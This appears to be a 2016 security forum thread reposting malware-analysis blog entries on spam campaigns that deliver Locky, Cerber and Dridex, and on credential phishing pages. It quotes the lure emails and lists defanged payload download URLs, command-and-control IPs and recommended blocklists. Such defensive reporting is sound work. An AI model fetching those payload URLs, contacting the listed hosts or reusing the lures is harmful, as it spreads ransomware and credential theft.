2072 replies to this topic

[AplusWebMaster]

FYI...

Fake 'invoices' SPAM - malicious attachment
- http://blog.dynamoo....wing-phone.html
25 May 2016 - "These -fake- financial spams come from different companies, all with a malicious attachment.
    From:    Frank.ClaraZO@ pr-real .com
    Date:    25 May 2016 at 11:34
    Subject:    The invoices from INCHCAPE PLC
    Hello,
    Following the phone conversation with the accounting department represantatives I'm sending you the invoices.
    Thank you for attention,
    Kind regards
    Clara Frank
    INCHCAPE PLC ...
    > Sent from Iphone

Attached is a ZIP file with a name similar to Invoice 5044-032841.zip which in turn contains a malicious script named in a similar manner to invoice(677454).js which typically has a detection rate of 3/56*. Hybrid Analysis** of that sample shows the script creating a PFX (personal certificate) file which is then transformed into a PIF (executable) file using the certutil.exe application. This PIF file itself has a detection rate of 6/56*** but automated analysis [1] [2].. is inconclusive. The behaviour is somewhat consistent with the Dridex banking trojan but may possibly be Locky ransomware."
* https://virustotal.c...sis/1464173596/

** https://www.hybrid-a...vironmentId=100

*** https://virustotal.c...sis/1464174246/

1] https://malwr.com/an...2I4YTNkNTIwZTY/

2] https://www.hybrid-a...vironmentId=100
___

Fake 'Operational Expense' SPAM - leads to Locky
- http://blog.dynamoo....ense-leads.html
25 May 2016 - "This -fake- financial spam leads to malware:
    From:    Theodora Hamer
    Date:    25 May 2016 at 12:17
    Subject:    Operational Expense
    Operational Expense of 7,350,80 USD has been credited from your account. For more details please refer to the report that can be found down below

This analysis is based on a trusted source (thank you!). Attached is a ZIP file containing a malicious script, downloading from:
alborzcrane .com/g1slEn.exe
alborzcrane .com/Z94n5r.exe
alintagranito .com/fOA8Bl.exe
alintagranito .com/xB7nku.exe
amazoo.com .br/R0koId.exe
avayeparseh .com/s0faxS.exe
buzzimports .com.au/cRQVC4.exe
buzzimports .com.au/ECScwi.exe
galabel .com/lRkuJX.exe
galabel .com/oQz26K.exe
jett .com/6APaSk.exe
kitchen38 .com/HYPETS.exe
kitchen38 .com/V1ygc2.exe
onestopcableshop .com/J7t6au.exe
osdc .eu/gct5TH.exe
osdc .eu/n2UuEj.exe
purfectcar .com/9OaoqM.exe
purfectcar .com/sHXqZT.exe
wisebuy .com/WiOqzB.exe
yearnjewelry .com/OnvBrc.exe
yearnjewelry .com/t8HnK3.exe
zhaoyk .com/Dmv3As.exe
zhaoyk .com/JbO9uX.exe
This drops what is apparently Locky ransomware, with a detection rate of 3/56*. This phones home to:
164.132.40.47 (OVH, France)
104.131.182.103 (Digital Ocean, US)
This Hybrid Analysis** shows the Locky ransomware in action.
Recommended blocklist:
164.132.40.47
104.131.182.103 "
* https://virustotal.c...5cf88/analysis/

** https://www.hybrid-a...vironmentId=100
___

Fake 'URGENT - DELIVERY' SPAM - leads to malware
- http://blog.dynamoo....very-jobin.html
25 May 2016 - "This -fake- delivery spam leads to malware:
    From:    Justin harmon
    Date:    25 May 2016 at 12:30
    Subject:    URGENT - DELIVERY
    Dear customer.
    Please find the attachment.
    Thanks & Best Regards
    Jobin Jacob
    HYTEX ...

Attached is a ZIP file that contains one of many scripts that downloads a binary from one of the following locations (according to a trusted third party, thank you!):
avi-vest .ro/3g34t3t4tggrt?[random-string]=[random-string]
bankruptcymag .com/3g34t3t4tggrt?[random-string]=[random-string]
bizconsulting .ro/3g34t3t4tggrt?[random-string]=[random-string]
brunohenrique .net/3g34t3t4tggrt?[random-string]=[random-string]
cjglobal .co/3g34t3t4tggrt?[random-string]=[random-string]
comecomunicare .eu/3g34t3t4tggrt?[random-string]=[random-string]
crimeshurt .com/3g34t3t4tggrt?[random-string]=[random-string]
digitacaoveloz .com.br/3g34t3t4tggrt?[random-string]=[random-string]
globalcredithub .com/3g34t3t4tggrt?[random-string]=[random-string]
lifeclinics .net/3g34t3t4tggrt?[random-string]=[random-string]
orobos .nyc/3g34t3t4tggrt?[random-string]=[random-string]
selonija .lv/3g34t3t4tggrt?[random-string]=[random-string]
smp.com .mx/3g34t3t4tggrt?[random-string]=[random-string]
sweethomesgroup .com/3g34t3t4tggrt?[random-string]=[random-string]
tspipp .tsu.tula .ru/3g34t3t4tggrt?[random-string]=[random-string]
unijovem .com.br/3g34t3t4tggrt?[random-string]=[random-string]
www .appoutpost .com/3g34t3t4tggrt?[random-string]=[random-string]
Where [random-string] seems to be a random alphanumeric string. The dropped binary is Locky ransomware (as seen in this Malwr report*) which phones home to:
164.132.40.47 (OVH, France)
104.131.182.103 (Digital Ocean, US)
These are the same C2 servers as found here**."
* https://malwr.com/an...DVkY2VlZjkwYmM/
Hosts
2.49.203.206
164.132.40.47

** http://blog.dynamoo....ense-leads.html
___

Fake 'Weekly report' SPAM - malicious attachment
- http://blog.dynamoo....lease-find.html
25 May 2016 - "This -fake- financial spam comes from random senders and companies and has a malicious attachment:
    From:    Alicia Ramirez
    Date:    25 May 2016 at 14:22
    Subject:    Weekly report
    Hi [redacted],
    Please find attached the Weekly report.
    King regards,
    Alicia Ramirez
    Castle (A.M.) & Co.

There are a -large- number of these, with a ZIP file -attached- containing malicious scripts with a typical detection rate of 3/56*. In this sample Malwr** analysis, it downloads a file from:
test.glafuri .net/yxk6s
There will certainly be a LOT of other download locations. The dropped file GSKQtcnNu8MS.exe has a detection rate of 4/55*** and that same VirusTotal report indicates C2 traffic to:
138.201.93.46 (Hetzner, Germany)
91.200.14.139 (PP SKS-LUGAN, Ukraine)
104.131.182.103 (Digital Ocean, US)
164.132.40.47 (OVH, France)
Even though other automated analysis -failed- [1] [2] this time we have previously identified -two- of those IPs[3] as being Locky ransomware, so there is little doubt that this will be more of the same.
Recommended blocklist:
138.201.93.46
91.200.14.139
104.131.182.103
164.132.40.47 "
* https://virustotal.c...5b177/analysis/

** https://malwr.com/an...DQzN2IzM2JmMWY/
Hosts
176.223.121.193

*** https://virustotal.c...b5f47/analysis/
TCP connections
138.201.93.46
91.200.14.139
104.131.182.103
164.132.40.47
69.195.129.70

1] https://www.hybrid-a...vironmentId=100

2] https://malwr.com/an...mFiYjM2NTg0Mzc/

3] http://blog.dynamoo....ense-leads.html
___

Fake 'Pan Card' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
25 May 2016 - "An email with the subject of 'Pan Card' pretending to come from email2jbala . <email2jbala@ gmail .com> with a malicious word doc attachment downloads Locky ransomware... 'never heard of a 'PAN card' and had to do a Google search to find out what it is. 'Turns out to be an Indian Identity card for income tax payments... The email looks like:
From: email2jbala . <email2jbala@igmail .com>
Date: Wed 25/05/2016 15:37
Subject: Pan Card
Attachment: 2015-25-05_333317.docm
    Attached is the PAN card as requested.
    You can mail me form 16.

25 May 2016: 2015-25-05_333317.docm - Current Virus total detections 7/55*
.. MALWR** shows a download from
 http ://www.asysa .cl/k7jhrt4hertg which gave the hendibe.exe which doesn’t look like an .exe file but is an HTML file (VirusTotal 0/57***) (Currently giving me a 404 'not found'). An alternative version gave me
 http ://majaz .co.uk/k7jhrt4hertg (VirusTotal 6/56[4]) which is the same Locky ransomware version from earlier today[5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464187080/

** https://malwr.com/an...WI5YTFjY2M5YzU/
Hosts
186.67.227.204

*** https://www.virustot...sis/1464191429/

4] https://www.virustot...sis/1464189317/
TCP connections
164.132.40.47

5] https://myonlinesecu...delivers-locky/

asysa .cl: 186.67.227.204: https://www.virustot...04/information/
>> https://www.virustot...fd834/analysis/
majaz .co.uk: 81.27.85.11: https://www.virustot...11/information/
>> https://www.virustot...2173a/analysis/
___

'WhatsApp Gold' SCAM -  spreads malware
- http://www.actionfra...s-malware-may16
24 May 2016 - "WhatsApp users are being tricked by fraudsters into downloading a -fake- version of WhatsApp which infects Android devices with malware. The "secret" messages sent to peoples inboxes claim you have an exclusive chance to download “WhatsApp Gold”. The scam messages claim to offer enhanced features used by celebrities. Victims are urged to sign up via-a-link-provided... After clicking-on-the-link you will be -redirected- to a -fake- page and your Android device will become infected with malware. If you have already followed the link to download the software, install some -antivirus- software onto your device to remove the malware..."
> https://www.helpnets...p-gold-malware/
May 25, 2016 - "... messages that offer 'WhatsApp Gold'..." [which does NOT exist.]
 

 

Edited by AplusWebMaster, 25 May 2016 - 11:09 AM.

[AplusWebMaster]

FYI...

Fake 'document' SPAM - malicious attachment
- http://blog.dynamoo....d-attached.html
26 May 2016 - "This spam appears to come from different companies and senders, and has a malicious attachment:
    From:    Sara Osborne
    Date:    26 May 2016 at 10:53
    Subject:    RE:
    Dear sales,
    Please find attached a document containing our responses to the other points which we
    discussed on Monday 23th May.
    Please let me know if you have any queries
    Regards,
    Wayfair Inc.
    Sara Osborne

Attached is a ZIP file (the ones I have seen so far all begin with responses_) which contains a malicious script name in a similar way to employees -382-.js. These have a typical detection rate of 4/56*. Two samples analysed by Malwr [1] [2] show download locations from:
newgeneration2010 .it/mkc27f
projectodetalhe .pt/do5j36a
There will be many other download locations too. These drop two different binaries (VirusTotal results [3] [4]). Those two VT results plus these two DeepViz analyses [5] [6] show the malware phoning home to:
138.201.93.46 (Hetzner, Germany)
107.181.187.12 (Total Server Solutions, US)
212.109.219.31 (JSC Server, Russia)
5.152.199.70 (Redstation, UK)
This behaviour is consistent with Locky ransomware.
Recommended blocklist:
138.201.93.46
107.181.187.12
212.109.219.31
5.152.199.70 "
* https://virustotal.c...sis/1464257175/

1] https://malwr.com/an...jJhN2Q5N2ZkYWE/
Hosts
217.73.226.220

2] https://malwr.com/an...2M4YjM5YjE0Nzg/
Hosts
50.87.30.230

3] https://virustotal.c...sis/1464258206/
TCP connections
138.201.93.46

4] https://virustotal.c...sis/1464258217/
TCP connections
212.109.219.31

5] https://sandbox.deep...e3cfcac4596264/

6] https://sandbox.deep...ae92a895d04552/
___

Fake 'document' SPAM - jpg embedded malware
- https://myonlinesecu...bedded-malware/
26 May 2016 - "A series of emails spoofing different companies with the subject of 'I/we have attached the  [document/file/declaration]' from [random company name] coming from  random senders with a malicious word doc attachment is another one from the current bot runs... Other subject lines include:
    Please review the attached relation from
Some of the alleged senders with compromised email address I have received from include:
    Nec Consulting <audiovideo7@ yandex .com>
    Turpis Inc. <rahul_k@ asus .com>
    Pharetra Sed Consulting <dibyendu@ digitexwebitsolutions .com>
    Aliquet Proin Velit Inc. <jdybala@ realmindhosting .com>
    Lobortis Corporation <apayne@ msicorp .com>
The email looks like:
From: Nec Consulting <audiovideo7@ yandex .com>
Date: Thu 26/05/2016 05:06
Subject: I have attached the document from Nec Consulting.
Attachment: 2-7925_273378123.dot
    I have attached the document from Nec Consulting.

26 May 2016: 2-7925_273378123.dot - Current Virus total detections 4/57*
.. Payload security** shows a download from 3dcadtools .com/img.jpg?FL=1 (VirusTotal 4/56***) which gives a proper jpg that contains embedded malware... will update later when one of the analysts has done it.
Screenshot of image: https://myonlinesecu...2016/05/jpg.png
.. DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464239384/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
208.66.129.67: https://www.virustot...67/information/

*** https://www.virustot...sis/1464242851/

3dcadtools .com: 208.66.129.67
___

Fake 'Summons' SPAM - delivers Locky
- https://myonlinesecu...cky-ransomware/
26 May 2016 - "... An email with the subject of 'Summons On The Case #4E459E46' [random numbered] pretending to come from  random senders with a zip attachment containing a JavaScript file which downloads Locky. It downloads the  same Locky version from the -same- locations described by Techhelplist[1]. So far he has found 150 odd download locations for this version. It should be noted that these JavaScript files have 2 encrypted download locations in them...
1] https://techhelplist...eclined-malware
26 May 2016 - "... Checks in with these C2 sites:
212.109.219.31: https://www.virustot...31/information/
>> https://www.virustot...22759/analysis/
5.152.199.70: https://www.virustot...70/information/
>> https://www.virustot...01971/analysis/
107.181.187.12: https://www.virustot...12/information/
>> https://www.virustot...96cc3/analysis/
 ..."
One of the  emails looks like:
From: Faye Third <ThirdFaye15@ booneritterinsurance .com>
Date: Thu 26/05/2016 17:02
Subject: Summons On The Case #4E459E46
Attachment: copy_260713.zip
    Good day, You are being summonsed to the court on the case #4E459E46. The penalty in the amount of $9,793,18 will be assigned in case you don’t show up. Information on the case is listed in the document enclosed.

This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

'Telegraphic transfer' - Phish
- http://blog.dynamoo....elegraphic.html
26 May 2016 - "At first glance this spam looks like malware, but it appears to be a -phish- instead:
    From:    General trading ltd [info@ 7studio .co]
    Date:    26 May 2016 at 05:04
    Subject:    Payment
    Dear Sir/Ma'am!
    As requested by our customer
    Please find attached telegraphic transfer copy for payment made to your account today.
    Kindly confirm once you received this payment.
    Regards
    Muhammad Farooq
    Exchange Manager,
    MCB New Garden Exchange
    U.A.E (1080) ...

Attached is a file TT-USD.pdf .. as a rule I would recommend -not- opening PDF files or other attachments from -unknown- sources. When you open the file it looks like this:
> https://2.bp.blogspo...0/pdf-phish.jpg

Yes, it does look that blurry. The enticement here is to click-the-link in the document, which is something I wouldn't recommend that you do because it could lead to a malicious download, exploit kit or in this case a simple phishing page hosted on poloimport2012 .com:
> https://4.bp.blogspo...pdf-phish-2.jpg

poloimport2012 .com: 192.185.214.25: https://www.virustot...25/information/
>> https://www.virustot...7f752/analysis/

This seems to be phishing for general webmail credentials. Of course, once a hacker has those they can use your account to send spam or even rifle through your private emails and reset passwords and gain access to other important accounts.Signing in with any credentials appears to fail*, but of course the bad guys have just harvested your password..
* https://3.bp.blogspo...pdf-phish-3.jpg
.. I don't recommend opening files like this and clicking-links to see where they go. I use a test environment to do this, but some similar spam emails can deliver malware that will silently plant itself on your computer which can be even more dangerous than this phish."
___

Fake 'new fax' SPAM - ransomware
- https://myonlinesecu...livers-malware/
25 May 2016 - "An email with the subject of 'You have received a new fax' pretending to come from Incoming Fax <Incoming.Fax@ victim domain .tld> with a zip attachment is another one from the current bot runs which delivers some malware... Edit: I am being told it is cerber ransomware:
> http://www.bleepingc...-speaks-to-you/
One of the  emails looks like:
From: Incoming Fax <Incoming.Fax@ victim domain .tld>
Date: Wed 25/05/2016 19:27
Subject: You have received a new fax
Attachment: IncomeMessage.zip
    You have received fax from XEROX41733530 at thespykiller .co.uk
    Scan date: Wed, 25 May 2016 10:26:43 -0800
    Number of page(s): 15
    Resolution: 400×400 DPI
    Name: Fax5704504
    Attached file is scanned image in PDF format.

25 May 2016: IncomeMessage.zip: Extracts to: IncomeMessage127286.scr - Current Virus total detections 3/57*
.. MALWR** shows some strange data files created/dropped by this that I assume need decrypting into an exe file. It also drops opencandy.dll, whether this is connected with the Open Candy adware or is just a coincidental name is open for discussion... Payload Security*** tells us it contacts 1 domain and -16385- hosts. View the network section[1] for more details... being told it is cerber ransomware... This is another one of the  files that unless you have “show known file extensions enabled“, can easily be mistaken for  a genuine  DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464200261/

** https://malwr.com/an...WQzYTVjYjUxYmU/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
ipinfo .io: 54.93.140.37: https://www.virustot...37/information/

1] https://www.hybrid-a...network-traffic
 

  

Edited by AplusWebMaster, 26 May 2016 - 12:28 PM.

[AplusWebMaster]

FYI...

Ransomware - Free Tools
- http://free.antiviru...m/us/index.html
May 26, 2016 - "These free ransomware tools can help users who have been infected with certain versions of ransomware and crypto-ransomware, allowing them to regain access to their system and files..."
> Crypto-Ransomware File Decryptor Tool:
- https://esupport.tre...US/1114221.aspx
> Lock Screen Ransomware Tool - unavailable at this time - check back later.
___

Fake 'Information request' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
27 May 2016 - "... an email with the subject of 'Information request' pretending to come from random senders  with a zip attachment which downloads Locky ransomware... One of the  emails looks like:
From: Damien Benson <BensonDamien52@ silvanasoda .com.br>
Date: Fri 27/05/2016 11:38
Subject: Information request
Attachment: changes_scan.910.zip
    Dear scan.910,
    As per our discussion yesterday, please find attached the amended meeting minutes.
    I have accepted the majority of the changes requested, however there are some that I have left in the document.
    I have included the edits as track changes.
    Please confirm that the changes we have made are acceptable.
    Many thanks
    Regards,
    Freshpet, Inc.
    Damien Benson ...

27 May 2016: changes_scan.910.zip: Extracts to: changes-4354-.js - Current Virus total detections 2/57*
.. MALWR** shows a download... from http ://genius-versand .de/n2e2n (VirusTotal 0/57***) which is another one of these malware that get downloaded as an encrypted text file that needs to be decrypted by the javascript (which is itself encrypted) to give a working .exe file and bypass antivirus & perimeter defences that block download of executable files. Payload security[4] gives us TC9ck9tl.exe (VirusTotal 7/57[5]). These all have anti analysis/Anti sandbox/VM protection to prevent analysis by security companies and researchers... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464345360/

** https://malwr.com/an...GNmMGY0MjIyNjA/
Hosts
78.46.53.123: genius-versand .de: https://www.virustot...23/information/
>> https://www.virustot...2efa7/analysis/

*** https://www.virustot...sis/1464346231/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
78.46.53.123

5] https://www.virustot...sis/1464346123/
TCP connections
5.152.199.70: https://www.virustot...70/information/
>> https://www.virustot...01971/analysis/

- http://blog.dynamoo....discussion.html
27 May 2016 - "This spam leads to Locky ransomware:
    From:    Meagan Branch
    Date:    27 May 2016 at 12:35
    Subject:    Information request
    Dear [redacted],
    As per our discussion yesterday, please find attached the amended meeting minutes.
    I have accepted the majority of the changes requested, however there are some that I have left in the document.
    I have included the edits as track changes.
    Please confirm that the changes we have made are acceptable.
    Many thanks
    Regards,
    Oramed Pharmaceuticals Inc.
    Meagan Branch ...

The senders vary from email to email. Attached is a ZIP file with a malicious script, which in the examples that I have found downloads one of a variety of malicious executables [1] [2].. which call home to the -same- IP addresses found in this earlier spam run*.
1] https://virustotal.c...sis/1464345833/
TCP connections
5.152.199.70

2] https://virustotal.c...sis/1464345851/
TCP connections
193.9.28.13

* http://blog.dynamoo....-nr-746441.html
27 May 2016 - "... The payload is Locky ransomware.
Recommended blocklist:
193.9.28.13
5.152.199.70
212.109.219.31
107.181.187.12 "
___

'Final PO Contract' - Phish
- http://blog.dynamoo....ntractxlsx.html
27 May 2016 - "This spam email is phishing for email credentials. Unlike some, this one seems to be quite well done and might convince unsuspecting people that it is genuine.
    From:    M Tufail Shakir [admin@ ebookmalls .com]
    Date:    27 May 2016 at 08:42
    Subject:    Re: Final PO Contract..xlsx
    Please see below attachment for the final signed contract
    Regards,
    27-05-2016
    Tom Yip | Regional Sales Team | Marchon Eyewear (HK) Ltd...

The link in this email goes to:
cagselectrical .com.au/libraries/emb/excel/excel/index.php?email=[redacted]
This gives a pretty convincing looking facsimile of an Excel spreadsheet, prompting for credentials:
> https://2.bp.blogspo...excel-phish.jpg
Entering any combination of username and password seems to work, then you get -redirected- to a GIF of a spreadsheet:
> https://2.bp.blogspo...cel-phish-2.jpg
Curiously, this GIF is not part of a phishing site but is on a wholly legitimate site belonging to a software company called Aspera (you can see it here):
> http://download.aspe...html/index.html
The asperasoft .com domain is NOT involved in the phishing nor has it been compromised. As ever, I would advise you -not- to explore links like this as they might lead to an exploit kit or malware, and bear in mind that some phishing pages are better than others, and this is one of the more convincing ones that I have seen recently."

cagselectrical .com.au: 103.1.110.130: https://www.virustot...30/information/
>> https://www.virustot...59dbc/analysis/
___

'Window Users Award' - Phish
- https://myonlinesecu...t-lottery-scam/
27 May 2016 - "An email with the subject of 'Microsoft Window Users Award' pretending to come from  Mr. Thomas Fisher <11@ nokopings .jp.tn> with a PDF attachment is a phishing scam... One of the emails looks like:
From: Mr. Thomas Fisher <11@ nokopings .jp.tn>
Date: Fri 27/05/2016 08:40
Subject:  Microsoft Window Users Award..,
Attachment: convert to microsoft.pdf

Screenshot: https://myonlinesecu...am-1024x550.png
 

 

Edited by AplusWebMaster, 27 May 2016 - 07:04 AM.

[AplusWebMaster]

FYI...

Fake 'Account Suspended' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
31 May 2016 - "... an email with the subject of 'Fraudlent Behavior – Account Suspended' pretending to come from random senders with a zip attachment which downloads Locky ransomware...

Screenshot: https://myonlinesecu...ed-1024x447.png

31 May 2016: caution_ubmit_63883018.zip: Extracts to: details_AbSfS.js - Current Virus total detections 3/57*
.. MALWR** shows a download of Locky ransomware from
 http ://handmee .com/hIPTXx (VirusTotal 3/57***)... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464686472/

** https://malwr.com/an...jVmYWY3NzczNmM/
Hosts
134.0.10.15
93.170.123.60

*** https://www.virustot...sis/1464687464/
TCP connections
195.154.69.90

handmee .com: 134.0.10.15: https://www.virustot...15/information/
>> https://www.virustot...a2873/analysis/
___

Fake 'Proposal' SPAM - RTF attachment malware
- https://myonlinesecu...malware-macros/
31 May 2016 - "An email where the subject is the word 'FWD: ' or 'Fw: ' and the alleged senders name pretending to come from random senders with a malicious word RTF doc spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Blossom J. Evans <garry@ tierneyandco .com>
Date: Tue 31/05/2016 10:47
Subject:Fw:Blossom J. Evans
Attachment: r03va37cl81h.rtf
    The attached proposal includes declaration.
    Blossom J. Evans

31 May 2016: r03va37cl81h.rtf - Current Virus total detections 4/57*
.. Malwr** isn’t showing any download or dropped content. Payload Security*** shows a download from
 admiralty .co.za/jsckhr.jpg?TXnIQmQZO=59 (VirusTotal 3/57[4]) which should be converted-by-the-macro to an exe file (however Payload does not show any actual .exe file in the report)..
31 May 2016: u18c.rtf - Current Virus total detections 4/57[5]. Malwr[6] isn’t showing any download or dropped content. Payload Security[7] shows the same jpg download as the other rtf file... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464688896/

** https://malwr.com/an...jUxNTE0OTg2MTQ/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
41.72.154.148: https://www.virustot...48/information/

4] https://www.virustot...sis/1464690295/

5] https://www.virustot...sis/1464689088/

6] https://malwr.com/an...jUxNTE0OTg2MTQ/

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
41.72.154.148

admiralty .co.za: 41.72.154.148
___

Fake 'New Message' SPAM - attachment leads to Locky
- http://blog.dynamoo....ew-message.html
31 May 2016 - "This -fake- financial spam has a malicious attachment:
    From:    Lanna Weall
    Date:    31 May 2016 at 12:18
    Subject:    New Message from your bank manager
    You have 1 new message from bank manager. To read it, please open the attachment down below.

In the sample I saw there was an attachment see_it_77235678.zip containing a malicious script warning_letter_Bdrh5W.js (detection rate 4/57*) and the Malwr analysis** of that sample shows that it downloads a binary from:
pvprojekt .pl/oLlqvX
The dropped binary is Locky ransomware with a detection rate of 4/56***. All those reports plus these analyses [1] [2] [3] show network traffic to:
85.17.19.102 (Leaseweb, Netherlands)
195.154.69.90 (Iliad Entreprises, France)
93.170.123.60 (PE Gornostay Mikhailo Ivanovich / time-host.net, Ukraine)
A trusted source (thank you) indicated that there was a earlier Locky campaign today...
Recommended blocklist:
85.17.19.102
195.154.69.90
93.170.123.60 "
* https://virustotal.c...7a77b/analysis/

** https://malwr.com/an...mNjNmYwNDAxNTk/
Hosts
193.107.88.86
85.17.19.102

*** https://virustotal.c...sis/1464694646/
TCP connections
195.154.69.90

1] https://malwr.com/an...jU3YWU1NTNlNDk/
Hosts
195.154.69.90

2] https://www.hybrid-a...vironmentId=100

3] https://sandbox.deep...858a943e7c6e7c/

- https://myonlinesecu...delivers-locky/
31 May 2016
Screenshot: https://myonlinesecu...er-1024x386.png
"... This one delivers the -same- Locky payload from the -same- sites in today’s earlier malspam run[1]..."
1] https://myonlinesecu...delivers-locky/
___

Fake 'New Company Order' SPAM - leads to malware
- http://blog.dynamoo....-order-abc.html
31 May 2016 - "This -fake- financial spam leads to malware:
    From:    accounting@ abcimportexport .com
    Reply-To:    userworldz@ yahoo .com
    To:    Recipients [accounting@ abcimportexport .com]
    Date:    31 May 2016 at 12:31
    Subject:    New Company Order
    Good Day,
    Find the attached specifications in the purchase order for our company mid year order & projects before sending your Proforma Invoice and do get back to me with your quotations asap.
    An Official order placement will follow as soon as possible.
    CLICK HERE TO DOWNLOAD & VIEW PURCHASE ORDER IF DOESNT WORK THEN CLICK
 HERE TO DOWNLOAD SECURE PURCHASE ORDER ...
ABC Import & Export,LLC 2534 Royal Lane
Suite # 205
Dallas,Texas 75229
USA ...

The link in the email message goes to gallery.mailchimp .com/4dcdbc9b7e95edf6788be6723/files/scan_purchase_orders.zip . This contains a malicious executable scan purchase orders.exe which has a detection rate of 3/56*. That VirusTotal report and these other analyses [1] [2].. shows network traffic to:
185.5.175.211 (Voxility SRL, Romania)
This executable drops another similar EXE [4] [5].. which phones home to the same IP. Between them, these reports indicate some sort of keylogger. There seems to be little of anything of value in this /24, so I would recommend blocking 185.5.175.0/24 "
* https://virustotal.c...sis/1464698175/
TCP connections
185.5.175.211

1] https://malwr.com/an...WY4MDc2ODMzOGE/
Hosts
185.5.175.211

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.5.175.211

4] https://virustotal.c...fe1a6/analysis/
TCP connections
185.5.175.211

5] https://malwr.com/an...zJiNGE5OTUyZjE/
Hosts
185.5.175.211
___

Fake 'Lottery Ticket' SPAM - downloads Locky
- https://myonlinesecu...leads-to-locky/
31 May 2016 - "... email from the Locky gang with the subject of 'Lottery Ticket #71088492' [random numbered]  pretending to come from random senders with a zip attachment which downloads Locky ransomware... One of the  emails looks like:
From: Jesse Amis <AmisJesse74004@ sabanet .ir>
Date: Tue 31/05/2016 15:34
Subject: Lottery Ticket #71088492
Attachment: warning_71088492.zip
    The e-version of your lottery ticket is enclosed to this e-mail.

31 May 2016: warning_71088492.zip: Extracts to: scanned_doc_Ay9bE.js - Current Virus total detections 8/57*
.. MALWR shows a download of Locky from
 http ://lizdion .net/9cRXIl (VirusTotal ***) Which is the -same- Locky ransomware version that has been used all day... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464705905/

** https://malwr.com/an...WJmMzU3NjU3ZjM/
Hosts
97.74.158.1
93.170.123.60

*** https://www.virustot...sis/1464706206/
TCP connections
195.154.69.90

lizdion .net: 97.74.158.1: https://www.virustot....1/information/
>> https://www.virustot...658c2/analysis/
___

Crypto-ransomware attacks Win7 and later ...
- http://blog.trendmic...-compatibility/
May 31. 2016 - "... new ZCRYPT ransomware family*... family only targets systems with newer versions of Windows, specifically Windows 7 and later:
* https://www.trendmic...ransom_zcrypt.a
... It makes the usual threats of deleting the files if the victim don’t pay up within a week. Ransom is set at 1.2 BTC (approximately 500 US dollars), with the ransom going up to 5 BTC (approximately 2,200 US dollars) after four days. The ransom note looks like this:
> https://blog.trendmi...6/05/zcrypt.png
... According to our analysis, it fails to either encrypt the files properly or display the ransom note when launched in an older version of Windows, such as Windows XP. The malware calls a function which does not exist in earlier versions of Windows; this breaks-it for the older operating systems... this particular family also tried to spread via USB flash disks: it plants a copy of itself onto removable drives.
This is relatively unusual in crypto-ransomware... The threat actor also enjoyed free anonymity because the domain registration masked the actual identity of registrant. The C&C domain is already tagged “canceled, suspended, refused, or reserved”.
Industry Practices: Backing up is still the best defense against crypto-ransomware; the 3-2-1 rule ensures that users still have a copy of their data even if they are affected by similar threats. We strongly advise against paying the ransom; this only ensures that the threat will continue to become bigger..."
>> https://www.trendmic...ware/index.html
 

  

Edited by AplusWebMaster, 31 May 2016 - 09:42 AM.

[AplusWebMaster]

FYI...

Fake 'ACH Bank account' SPAM - delivers Cerber ransomware
- https://myonlinesecu...ber-ransomware/
31 May 2016 - "An email with the subject of 'ACH – Bank account information form' pretending to come from  Ali Bolton <Ali.Bolton@ jpmchase .com> with a zip attachment which downloads Cerber ransomware... One of the  emails looks like:
From: Ali Bolton <Ali.Bolton@ jpmchase .com>
Date: Tue 31/05/2016 21:29
Subject: ACH – Bank account information form
Attachment: Check_Copy_Void.zip
    Please fill out and return the attached ACH form along with a copy of a voided check.
    Ali Bolton,
    JPMorgan Chase
    GRE Project Accounting
    Vendor Management & Bid/Supervisor ...

31 May 2016: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr - Current Virus total detections 5/57*
.. Payload security** doesn’t show any download location of any further malware but the network section shows a connection to ipinfo .io and -16386- hosts which is a definite indication of Cerber ransomware.
MALWR*** doesn’t show anything interesting and is only mentioned for other researchers to download the sample. Whoever uploaded at Payload Security declined to share the sample... This is another one of the  files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464726882/

** https://www.hybrid-a...vironmentId=100

*** https://malwr.com/an...WUwNTg0OTU3ZWU/

ipinfo .io: 52.3.78.30: https://www.virustot...30/information/
>> https://www.virustot...80842/analysis/
54.84.252.139: https://www.virustot...39/information/
>> https://www.virustot...6e375/analysis/
54.88.175.149: https://www.virustot...49/information/
>> https://www.virustot...80842/analysis/
___

DRIDEX Poses as Fake Certificate in Latest Spam Run
- http://blog.trendmic...ke-certificate/
Jun 1, 2016 - "... we observed a sudden spike in DRIDEX–related spam emails after its seeming ‘hiatus.’ This spam campaign mostly affected users in the United States, Brazil, China, Germany, and Japan:
> https://blog.trendmi...countries-2.jpg
